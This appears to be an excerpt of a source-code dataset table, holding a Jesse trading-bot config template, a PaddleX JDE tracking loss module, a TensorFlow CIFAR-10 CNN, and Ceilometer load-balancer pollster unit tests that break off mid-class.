hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ff1e63bfe9d1089667daed1c4cbb385d5f6c2ed2
| 6,707
|
py
|
Python
|
jesse/services/project_maker/project_template/config.py
|
noenfugler/jesse
|
217a3168620a755c1a9576d9deb27105db7dccf8
|
[
"MIT"
] | 1
|
2021-03-25T09:25:49.000Z
|
2021-03-25T09:25:49.000Z
|
jesse/services/project_maker/project_template/config.py
|
noenfugler/jesse
|
217a3168620a755c1a9576d9deb27105db7dccf8
|
[
"MIT"
] | null | null | null |
jesse/services/project_maker/project_template/config.py
|
noenfugler/jesse
|
217a3168620a755c1a9576d9deb27105db7dccf8
|
[
"MIT"
] | 1
|
2021-09-28T16:23:40.000Z
|
2021-09-28T16:23:40.000Z
|
config = {
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PostgreSQL Database
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# PostgreSQL is used as the database to store data such as candles.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'databases': {
'postgres_host': '127.0.0.1',
'postgres_name': 'jesse_db',
'postgres_port': 5432,
'postgres_username': 'jesse_user',
'postgres_password': 'password',
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Caching
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# In some cases such as loading candles in the backtest mode, a
# caching mechanism is used to make further loadings faster.
# Valid options (so far) are: 'pickle', None
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'caching': {
'driver': 'pickle'
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Exchanges
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below values are used for exchanges.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'exchanges': {
# https://www.bitfinex.com
'Bitfinex': {
'fee': 0.002,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USD',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'USD', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
# https://www.binance.com
'Binance': {
'fee': 0.001,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
# https://www.binance.com
'Binance Futures': {
'fee': 0.0004,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
],
},
# https://testnet.binancefuture.com
'Testnet Binance Futures': {
'fee': 0.0004,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USDT',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
],
},
# https://pro.coinbase.com
'Coinbase': {
'fee': 0.005,
# backtest mode only: accepted are 'spot' and 'futures'
'type': 'futures',
# futures mode only
'settlement_currency': 'USD',
# accepted values are: 'cross' and 'isolated'
'futures_leverage_mode': 'cross',
# 1x, 2x, 10x, 50x, etc. Enter as integers
'futures_leverage': 1,
'assets': [
{'asset': 'USDT', 'balance': 10_000},
{'asset': 'USD', 'balance': 10_000},
{'asset': 'BTC', 'balance': 0},
],
},
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Logging
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are used to filter out the extra logging
# info that are displayed when the "--debug" flag is enabled.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'logging': {
'order_submission': True,
'order_cancellation': True,
'order_execution': True,
'position_opened': True,
'position_increased': True,
'position_reduced': True,
'position_closed': True,
'shorter_period_candles': False,
'trading_candles': True,
'balance_update': True,
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Metrics
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are used to set the metrics
# that are displayed after a backtest.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'metrics': {
'sharpe_ratio': True,
'calmar_ratio': False,
'sortino_ratio': False,
'omega_ratio': False,
'winning_streak': False,
'losing_streak': False,
'largest_losing_trade': False,
'largest_winning_trade': False,
'total_winning_trades': False,
'total_losing_trades': False,
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Optimize mode
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are related to the optimize mode
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'optimization': {
# sharpe, calmar, sortino, omega
'ratio': 'sharpe',
},
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Data
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Below configurations are related to the data
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
'data': {
# The minimum number of warmup candles that is loaded before each session.
'warmup_candles_num': 240,
}
}
| 33.873737
| 82
| 0.391979
|
ebab252286552ce06263d8987646f934cd7eea9a
| 7,153
|
py
|
Python
|
paddlex/ppdet/modeling/losses/jde_loss.py
|
MichaelZhero/PaddleX
|
bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7
|
[
"Apache-2.0"
] | 1
|
2021-11-12T03:17:02.000Z
|
2021-11-12T03:17:02.000Z
|
paddlex/ppdet/modeling/losses/jde_loss.py
|
MichaelZhero/PaddleX
|
bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7
|
[
"Apache-2.0"
] | null | null | null |
paddlex/ppdet/modeling/losses/jde_loss.py
|
MichaelZhero/PaddleX
|
bedaa2a1cbefc9078cc00faa10dd4b9de655b1e7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlex.ppdet.core.workspace import register
__all__ = ['JDEDetectionLoss', 'JDEEmbeddingLoss', 'JDELoss']
@register
class JDEDetectionLoss(nn.Layer):
__shared__ = ['num_classes']
def __init__(self, num_classes=1):
super(JDEDetectionLoss, self).__init__()
self.num_classes = num_classes
def det_loss(self, p_det, anchor, t_conf, t_box):
pshape = paddle.shape(p_det)
pshape.stop_gradient = True
nB, nGh, nGw = pshape[0], pshape[-2], pshape[-1]
nA = len(anchor)
p_det = paddle.reshape(
p_det, [nB, nA, self.num_classes + 5, nGh, nGw]).transpose(
(0, 1, 3, 4, 2))
# 1. loss_conf: cross_entropy
p_conf = p_det[:, :, :, :, 4:6]
p_conf_flatten = paddle.reshape(p_conf, [-1, 2])
t_conf_flatten = t_conf.flatten()
t_conf_flatten = paddle.cast(t_conf_flatten, dtype="int64")
t_conf_flatten.stop_gradient = True
loss_conf = F.cross_entropy(
p_conf_flatten, t_conf_flatten, ignore_index=-1, reduction='mean')
loss_conf.stop_gradient = False
# 2. loss_box: smooth_l1_loss
p_box = p_det[:, :, :, :, :4]
p_box_flatten = paddle.reshape(p_box, [-1, 4])
t_box_flatten = paddle.reshape(t_box, [-1, 4])
fg_inds = paddle.nonzero(t_conf_flatten > 0).flatten()
if fg_inds.numel() > 0:
reg_delta = paddle.gather(p_box_flatten, fg_inds)
reg_target = paddle.gather(t_box_flatten, fg_inds)
else:
reg_delta = paddle.to_tensor([0, 0, 0, 0], dtype='float32')
reg_delta.stop_gradient = False
reg_target = paddle.to_tensor([0, 0, 0, 0], dtype='float32')
reg_target.stop_gradient = True
loss_box = F.smooth_l1_loss(
reg_delta, reg_target, reduction='mean', delta=1.0)
loss_box.stop_gradient = False
return loss_conf, loss_box
def forward(self, det_outs, targets, anchors):
"""
Args:
det_outs (list[Tensor]): output from detection head, each one
is a 4-D Tensor with shape [N, C, H, W].
targets (dict): contains 'im_id', 'gt_bbox', 'gt_ide', 'image',
'im_shape', 'scale_factor' and 'tbox', 'tconf', 'tide' of
each FPN level.
anchors (list[list]): anchor setting of JDE model, N row M col, N is
the anchor levels(FPN levels), M is the anchor scales each
level.
"""
assert len(det_outs) == len(anchors)
loss_confs = []
loss_boxes = []
for i, (p_det, anchor) in enumerate(zip(det_outs, anchors)):
t_conf = targets['tconf{}'.format(i)]
t_box = targets['tbox{}'.format(i)]
loss_conf, loss_box = self.det_loss(p_det, anchor, t_conf, t_box)
loss_confs.append(loss_conf)
loss_boxes.append(loss_box)
return {'loss_confs': loss_confs, 'loss_boxes': loss_boxes}
@register
class JDEEmbeddingLoss(nn.Layer):
def __init__(self, ):
super(JDEEmbeddingLoss, self).__init__()
self.phony = self.create_parameter(shape=[1], dtype="float32")
def emb_loss(self, p_ide, t_conf, t_ide, emb_scale, classifier):
emb_dim = p_ide.shape[1]
p_ide = p_ide.transpose((0, 2, 3, 1))
p_ide_flatten = paddle.reshape(p_ide, [-1, emb_dim])
mask = t_conf > 0
mask = paddle.cast(mask, dtype="int64")
mask.stop_gradient = True
emb_mask = mask.max(1).flatten()
emb_mask_inds = paddle.nonzero(emb_mask > 0).flatten()
emb_mask_inds.stop_gradient = True
# use max(1) to decide the id, TODO: more reseanable strategy
t_ide_flatten = t_ide.max(1).flatten()
t_ide_flatten = paddle.cast(t_ide_flatten, dtype="int64")
valid_inds = paddle.nonzero(t_ide_flatten != -1).flatten()
if emb_mask_inds.numel() == 0 or valid_inds.numel() == 0:
# loss_ide = paddle.to_tensor([0]) # will be error in gradient backward
loss_ide = self.phony * 0 # todo
else:
embedding = paddle.gather(p_ide_flatten, emb_mask_inds)
embedding = emb_scale * F.normalize(embedding)
logits = classifier(embedding)
ide_target = paddle.gather(t_ide_flatten, emb_mask_inds)
loss_ide = F.cross_entropy(
logits, ide_target, ignore_index=-1, reduction='mean')
loss_ide.stop_gradient = False
return loss_ide
def forward(self, ide_outs, targets, emb_scale, classifier):
loss_ides = []
for i, p_ide in enumerate(ide_outs):
t_conf = targets['tconf{}'.format(i)]
t_ide = targets['tide{}'.format(i)]
loss_ide = self.emb_loss(p_ide, t_conf, t_ide, emb_scale,
classifier)
loss_ides.append(loss_ide)
return loss_ides
@register
class JDELoss(nn.Layer):
def __init__(self):
super(JDELoss, self).__init__()
def forward(self, loss_confs, loss_boxes, loss_ides, loss_params_cls,
loss_params_reg, loss_params_ide, targets):
assert len(loss_confs) == len(loss_boxes) == len(loss_ides)
assert len(loss_params_cls) == len(loss_params_reg) == len(
loss_params_ide)
assert len(loss_confs) == len(loss_params_cls)
batchsize = targets['gt_bbox'].shape[0]
nTargets = paddle.nonzero(paddle.sum(targets['gt_bbox'],
axis=2)).shape[0] / batchsize
nTargets = paddle.to_tensor(nTargets, dtype='float32')
nTargets.stop_gradient = True
jde_losses = []
for i, (loss_conf, loss_box, loss_ide, l_conf_p, l_box_p,
l_ide_p) in enumerate(
zip(loss_confs, loss_boxes, loss_ides, loss_params_cls,
loss_params_reg, loss_params_ide)):
jde_loss = l_conf_p(loss_conf) + l_box_p(loss_box) + l_ide_p(
loss_ide)
jde_losses.append(jde_loss)
loss_all = {
"loss_conf": sum(loss_confs),
"loss_box": sum(loss_boxes),
"loss_ide": sum(loss_ides),
"loss": sum(jde_losses),
"nTargets": nTargets,
}
return loss_all
| 39.087432
| 83
| 0.614008
|
e7e4b5a35b0a9bea027958ef4ef96d413a1c2878
| 5,931
|
py
|
Python
|
graph.py
|
mahendrakariya/neuralnet_cifar10
|
d6f4f84324e15b9527e47f7f4c5a900850d07989
|
[
"Apache-2.0"
] | null | null | null |
graph.py
|
mahendrakariya/neuralnet_cifar10
|
d6f4f84324e15b9527e47f7f4c5a900850d07989
|
[
"Apache-2.0"
] | null | null | null |
graph.py
|
mahendrakariya/neuralnet_cifar10
|
d6f4f84324e15b9527e47f7f4c5a900850d07989
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
BATCH_SIZE = 128
HIDDEN_SIZE = 200
HIDDEN_SIZE_2 = HIDDEN_SIZE // 2
INITIAL_LEARNING_RATE = 0.0001
DECAY_STEPS = 3438 # 4560 #3438 (382*9)
LEARNING_RATE_DECAY_FACTOR = 0.1
MOVING_AVERAGE_DECAY = 0.9999
def inference(images):
with tf.variable_scope('conv1') as scope:
kernel = tf.get_variable("weights1", shape=[5, 5, 3, 64],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', [64], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias)
tf.histogram_summary("conv1_activations", conv1)
tf.scalar_summary("conv1_sparsity", tf.nn.zero_fraction(conv1))
tf.scalar_summary("conv1_weights", tf.reduce_mean(kernel))
# pool 1
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
pool1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
pool1 = tf.nn.dropout(pool1, 0.4)
with tf.variable_scope('conv2') as scope:
kernel = tf.get_variable("weights2", shape=[5, 5, 64, 128],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', [128], initializer=tf.constant_initializer(0.1))
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias)
tf.histogram_summary("conv2_activations", conv2)
tf.scalar_summary("conv2_sparsity", tf.nn.zero_fraction(conv2))
tf.scalar_summary("conv2_weights", tf.reduce_mean(kernel))
# pool 2
pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
pool2 = tf.nn.dropout(pool2, 0.6)
# local 3
with tf.variable_scope('local3') as scope:
reshape = tf.reshape(pool2, [BATCH_SIZE, -1])
dim = reshape.get_shape()[1].value
weights = tf.get_variable("weights3", [dim, HIDDEN_SIZE], initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable('biases', [HIDDEN_SIZE], initializer=tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases)
tf.histogram_summary("local3_activations", local3)
tf.scalar_summary("local3_sparsity", tf.nn.zero_fraction(local3))
tf.scalar_summary("local3_weights", tf.reduce_mean(weights))
# local 4
with tf.variable_scope('local4') as scope:
weights = tf.get_variable("weights4", [HIDDEN_SIZE, HIDDEN_SIZE_2],
initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable('biases', [HIDDEN_SIZE_2], initializer=tf.constant_initializer(0.1))
local4 = tf.nn.relu(tf.matmul(local3, weights) + biases)
tf.histogram_summary("local4_activations", local4)
tf.scalar_summary("local4_sparsity", tf.nn.zero_fraction(local4))
tf.scalar_summary("local4_weights", tf.reduce_mean(weights))
# softmax
with tf.variable_scope('softmax') as scope:
weights = tf.Variable(tf.truncated_normal([HIDDEN_SIZE_2, 10], stddev=1 / HIDDEN_SIZE_2))
biases = tf.get_variable('biases', [10], initializer=tf.constant_initializer(0.0))
softmax_linear = tf.matmul(local4, weights) + biases
tf.histogram_summary("softmax_activations", softmax_linear)
tf.scalar_summary("softmax_weights", tf.reduce_mean(weights))
return softmax_linear
def _add_loss_summaries(total_loss):
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
losses = tf.get_collection('losses')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.scalar_summary(l.op.name + ' (raw)', l)
tf.scalar_summary(l.op.name, loss_averages.average(l))
return loss_averages_op
def loss(logits, labels):
labels = tf.cast(labels, tf.int64)
xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='xentropy')
xentropy_mean = tf.reduce_mean(xentropy, name='xentropy_mean')
tf.add_to_collection('losses', xentropy_mean)
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def train(total_loss, global_step):
lr = tf.train.exponential_decay(INITIAL_LEARNING_RATE, global_step, DECAY_STEPS, LEARNING_RATE_DECAY_FACTOR,
staircase=True)
tf.scalar_summary('learning_rate', lr)
loss_averages_op = _add_loss_summaries(total_loss)
with tf.control_dependencies([loss_averages_op]):
opt = tf.train.AdamOptimizer(lr)
grads = opt.compute_gradients(total_loss)
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
for grad, var in grads:
if grad is not None:
tf.histogram_summary(var.op.name + '/gradients', grad)
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
train_op = tf.no_op(name='train')
return train_op
def evaluate(logits, labels):
correct = tf.nn.in_top_k(logits, labels, 1)
return tf.reduce_sum(tf.cast(correct, tf.int32))
def _leaky_relu(x, alpha):
return tf.maximum(alpha*x, x)
| 42.669065
| 117
| 0.683359
|
82b331e15079ea0bfece29e043f5d39846bcefbe
| 21,664
|
py
|
Python
|
ceilometer/tests/unit/network/services/test_lbaas.py
|
andymcc/ceilometer
|
fa3b047eb17152b30829eadd9220f12ca9949b4f
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/network/services/test_lbaas.py
|
andymcc/ceilometer
|
fa3b047eb17152b30829eadd9220f12ca9949b4f
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/network/services/test_lbaas.py
|
andymcc/ceilometer
|
fa3b047eb17152b30829eadd9220f12ca9949b4f
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2014 Cisco Systems,Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import fixture as fixture_config
from oslotest import base
from oslotest import mockpatch
from ceilometer.agent import manager
from ceilometer.agent import plugin_base
from ceilometer.network.services import discovery
from ceilometer.network.services import lbaas
class _BaseTestLBPollster(base.BaseTestCase):
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def setUp(self):
super(_BaseTestLBPollster, self).setUp()
self.addCleanup(mock.patch.stopall)
self.CONF = self.useFixture(fixture_config.Config()).conf
self.manager = manager.AgentManager(0, self.CONF)
self.CONF.set_override('neutron_lbaas_version',
'v1',
group='service_types')
plugin_base._get_keystone = mock.Mock()
catalog = (plugin_base._get_keystone.session.auth.get_access.
return_value.service_catalog)
catalog.get_endpoints = mock.MagicMock(
return_value={'network': mock.ANY})
class TestLBPoolPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBPoolPollster, self).setUp()
self.pollster = lbaas.LBPoolPollster(self.CONF)
fake_pools = self.fake_get_pools()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_get_all',
return_value=fake_pools))
@staticmethod
def fake_get_pools():
return [{'status': 'ACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'INACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb02',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'PENDING_CREATE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb03',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'UNKNOWN',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb03',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
{'status': 'error',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'fe7rad36-437d-4c84-aee1-186027d3bdcd',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb_error',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
]
def test_pool_get_samples(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_pools()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_pool_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_pools()))
self.assertEqual(set(['network.services.lb.pool']),
set([s.name for s in samples]))
def test_pool_discovery(self):
discovered_pools = discovery.LBPoolsDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_pools))
for pool in self.fake_get_pools():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_pools)
else:
self.assertIn(pool, discovered_pools)
class TestLBVipPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBVipPollster, self).setUp()
self.pollster = lbaas.LBVipPollster(self.CONF)
fake_vips = self.fake_get_vips()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'vip_get_all',
return_value=fake_vips))
@staticmethod
def fake_get_vips():
return [{'status': 'ACTIVE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.2',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip'},
{'status': 'INACTIVE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.3',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'ba6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip02'},
{'status': 'PENDING_CREATE',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.4',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip03'},
{'status': 'UNKNOWN',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.8',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip03'},
{'status': 'error',
'status_description': None,
'protocol': 'HTTP',
'description': '',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'connection_limit': -1,
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'session_persistence': None,
'address': '10.0.0.8',
'protocol_port': 80,
'port_id': '3df3c4de-b32e-4ca1-a7f4-84323ba5f291',
'id': 'fg6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'myvip_error'},
]
def test_vip_get_samples(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_vips()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_vip_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
resources=self.fake_get_vips()))
self.assertEqual(set(['network.services.lb.vip']),
set([s.name for s in samples]))
def test_vip_discovery(self):
discovered_vips = discovery.LBVipsDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_vips))
for pool in self.fake_get_vips():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_vips)
else:
self.assertIn(pool, discovered_vips)
class TestLBMemberPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBMemberPollster, self).setUp()
